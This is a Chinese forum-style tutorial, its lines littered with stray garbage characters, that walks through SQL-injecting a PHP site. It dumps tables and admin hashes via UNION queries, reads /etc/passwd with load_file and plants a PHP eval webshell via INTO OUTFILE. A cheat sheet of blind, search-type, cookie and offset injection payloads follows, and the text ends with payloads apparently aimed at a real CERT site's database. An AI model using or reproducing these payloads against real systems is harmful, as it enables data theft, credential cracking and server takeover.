我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~: m- h) t, M/ l7 U* c
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
a5 i- _7 g6 R* q6 F我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
2 s! e1 _+ B" |. m8 O9 l0 k& [, F如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
X- [5 E( s1 A( b5 p6 \' d1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)- S0 V6 G" Z- U0 g* |5 a7 m
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
- ?! s3 Y, W. @Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in! ?% S$ D5 {. t' v) V+ T
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入; L8 d0 k6 _4 w0 |& }$ J
W* I% {0 a2 q3 g( G$ w2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,9 K1 {( T+ G4 S* A( x9 n8 v
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
. [0 N( N) c$ Y/ t4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
/ n/ x5 V( q2 L U" n( S4 `- Z5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
. ` x# G, |& q) |有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
: H& q, _; D$ `' G6 \5 I2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
) k* p2 K! Y, C; c ]2 r我就用的是第二个思路,
" u: ~ @8 [/ J提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- 7 n7 ?, a9 C& T& O' _' T
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
# N2 ^8 Q5 X" ]提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
* z# K( F" P' J6 \% S注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。* _9 `9 J0 I. m# O. B1 A) c8 H5 t
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
& \0 E X2 M" V5 R) m% p2 X$ T! U4 I% O是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
3 k! }# j! o! ~/ a2 A4 I5 J提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 -- Y" r9 z9 \7 A- Y5 r
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
. {5 G) k9 G6 h ? K$ f调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
! n) X+ W2 U9 b" ]0 Q下面是一些很普遍注入方式资料:
& a: o! ]$ G' B注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
k' S: O$ {; C3 S3 {* h k% i: s3 G拆半法, l5 V _ p3 u- c
######################################
* R- q" d- b/ ~$ _3 Y2 i' Q& @and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
, c! L+ d7 b' U. H4 L1 C* ~and exists (select * from admin)
8 m2 W5 J6 _- B* Nand exists(select id from admin)1 K. d" T( x) ?
and exists(select id from admin where id=1)
$ h. k9 j) E1 R& G6 J e* Band exists(select id from admin where id>1) 6 t4 Y& G7 \( k4 q8 S+ r3 [0 q
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
1 s5 ?) b0 W) R' m2 u* o, Hand exists (select username from admin)
$ a7 F1 f4 U) H+ V" J0 Wand exists (select password from admin)1 D2 G, T) f6 y' t
and exists (select id from admin where len(username)<10 and id=1)% e1 y0 ?+ j+ X# j* O+ H X: n; X0 ~
and exists (select id from admin where len(username)>5 and id=1)0 ~! B9 s# R, I* f2 Z7 I$ |: Z
and exists (select id from admin where len(username)=6 and id=1)
( ^+ d9 I( K7 A* X: f1 Q+ [ yand exists (select id from admin where len(password)<10 and id=1)/ c8 f6 Z6 D0 f5 S( X$ D# A
and exists (select id from admin where len(password)>5 and id=1)
+ k+ G/ v1 }6 Fand exists (select id from admin where len(password)=7 and id=1), e- v3 I" y$ U$ M5 V8 e
and (select top 1 asc(mid(username,1,1)) from admin)=97/ p2 P0 d' I$ A, L4 ^, q
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。/ c! \! ^7 j6 ]! @3 ^
猜第二位把username,1,1改成username,2,1就可以了。
2 T" v D; W# }. c( W" H猜密码把username改成password就OK了
* E" J; s$ a/ C" j$ @ t9 h##################################################
- f1 b2 `' r; l: X) U- d搜索型注入
8 s9 r1 K9 q* P _, g##################################' a3 W" h1 z0 j
%' and 1=1 and '%'='; Y4 y& s5 W& |* p4 O
%' and exists (select * from admin) and '%'='
; S: u3 l# ]5 N0 _. Q. o5 b%' and exists(select id from admin where id=1) and '%'=' s, t) {- @( O; S
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='8 d: }! I! V+ o) K: v' p, v
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='( [, h" r7 J2 |/ x
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
1 m6 ~5 D+ E: l6 y这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='+ V: X2 n1 |; t. C }8 ^; b2 [% o. O
对于MSSQL数据库,后面可以吧 and '%'='换成--
$ D6 R+ J2 z8 b5 o* b" y5 a还有一点搜索型注入也可以使用union语句。
9 ^( z2 }& g3 U/ C########################################################
B/ N, L+ V3 P! Z; X( y" i联合查询。
: Z: o8 t3 M( F: v+ |) M" g#####################################8 x5 g2 \7 |2 e* k% m4 R' v; ~
order by 10( }$ K( ]4 o4 }$ V5 N
and 1=2 union select 1,2,3,4,5,6,7,8,9,100 `! L8 F' ]% B# V, d4 Y- P
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin3 g/ ?# X" Z* U6 L# G
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1- A4 Z8 p$ r+ |
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)5 i. @% z' E4 ]8 q# F: t' k
###################################
( q, o" l i* ~8 `; M5 Lcookie注入
3 ~! W8 p3 E$ u: v" w4 ^+ Z7 y; j9 \###############################
- h/ h8 g9 i& ?http://www.******.com/shownews.asp?id=127
9 M% [& |4 ~6 Y. H- ~7 Dhttp://www.******.com/shownews.asp: j1 T* m& w1 p' i( S) {4 w
alert(="id="+escape("127"));/ v2 p. O4 \ O! F/ Z
alert(="id="+escape("127 and 1=1"));4 E. p4 m2 [* j0 L- j5 ~% W
alert(="id="+escape("127 order by 10"));* D0 B9 I& f c7 l: Y
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));( U% S3 |" U3 U/ p
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
* c6 B4 w; i8 {# `9 a2 t这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
, C5 q; ^! ?; Z, }2 y###################################
$ I2 @3 _1 {: R: F: K# e6 a W偏移注入
3 X: n" J+ ~/ q, S7 [###########################################################( X1 m* K- ]6 H+ y7 y2 `4 u7 o
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin) \# k. @$ x+ T; Y$ @
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin6 M1 z Z% Z; ~8 G! {
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)* F/ C$ D3 Y. M
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
$ i8 W% _$ K$ i: yunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id), W. Q3 H# x, E2 O7 X7 Q
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
' V" i- Q# z7 f @, F' w; uunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on! B- j3 N' L' ^' \' A6 w
a.id=d.id) v$ h4 }2 x4 b
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id), l- W- |9 ~% c z6 a2 ]- |3 T' k
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
6 W+ @# `* ], \9 c% Y1 @% O9 X. }4 | + ]. Z- T6 r+ Y( m8 H
============================================================================================================$ w$ ?. m( }; ^9 k1 g2 U M
1.判断版本
; f" j- Y. P2 K) v& e' xand ord(mid(version(),1,1))>51
3 {0 Y9 V; i& `0 }$ U' n& s2 ^返回正常,说明大于4.0版本,支持ounion查询
( P2 E& z- Z# h# c2 E* N2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解) S. }0 O. A" V2 ~0 m
and 2=4 union select 1,2,3,4,5,6,7,8,9--) p7 q2 I% e% v; B& ^9 Q
3.查看数据库版本及当前用户,7 H1 p4 \7 B3 g W% `
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--8 k' @; g# D# w% b
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
" G6 r# _7 \1 e, P, W% @4.判断有没有写权限5 Q$ c3 w4 _) q, Q/ q1 S# i0 [7 o( M
and (select count(*) from MySQL.user)>0--
' q' z" t2 L* p+ o' t2 k5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1" `5 s# |: ?; }. J7 M9 E, K
用不了这个命令,就学习土耳其黑客手法,如下
. D1 v1 C, `- m& Zand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--" F* [: A8 }- L# ]" H5 h, v
6.爆表,爆库
- v1 A) u% r' K2 fand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--# q( ^* Q ~$ q+ L
7.爆列名,爆表
' d. E) i& n9 E: h* k/ v, dand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
8 P( i3 i! r( [* J+ m8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
+ f2 A/ v7 z, [" ^! |and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
( i! Z8 L# X+ _& b- U9.爆字段内容
D7 s4 g u& U1 t' s; kand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
' x! A V% E6 U, uhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |